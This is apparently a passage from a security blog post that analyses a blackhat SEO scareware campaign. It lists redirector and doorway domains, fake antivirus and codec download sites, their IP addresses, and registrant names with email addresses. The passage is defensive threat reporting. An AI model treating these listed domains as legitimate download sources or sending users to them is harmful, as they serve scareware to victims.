The redirection process consists of two layers. The first one is redirecting to hjgf .ru/go.php?sid=5 (88.214.198.25) and then to msscan-files-antivir .com (195.88.81.93), and the second one takes place through a well known malicious doorway redirecting domain hqtube .com/to_traf_holder.html (88.85.66.116) that either serves a fake codec that's dropping the scareware, or the scareware itself from files.ms-load-av .com. The rest of the scareware/fake security software domains participating in the campaigns are as follows:

msscan-files-antivir .com (195.88.81.93) - Coi Carol Email: car0sta0@gmail.com
hot-girl-sex-tube .com - Erica Thomas Email: gerrione@gmail.com
msscan-files-antivir .com
msscanner-top-av .com - Mui Arnold Email: arnoebr@gmail.com
msscanner-files-av .com
antivir-4pc-ms-av .com - Jason Munguia Email: jasmung@gmail.com

The bottom line - the campaign looks like a typical event-based blackhat SEO portfolio diversification practice.
- No comments:
Subscribe to: Posts (Atom)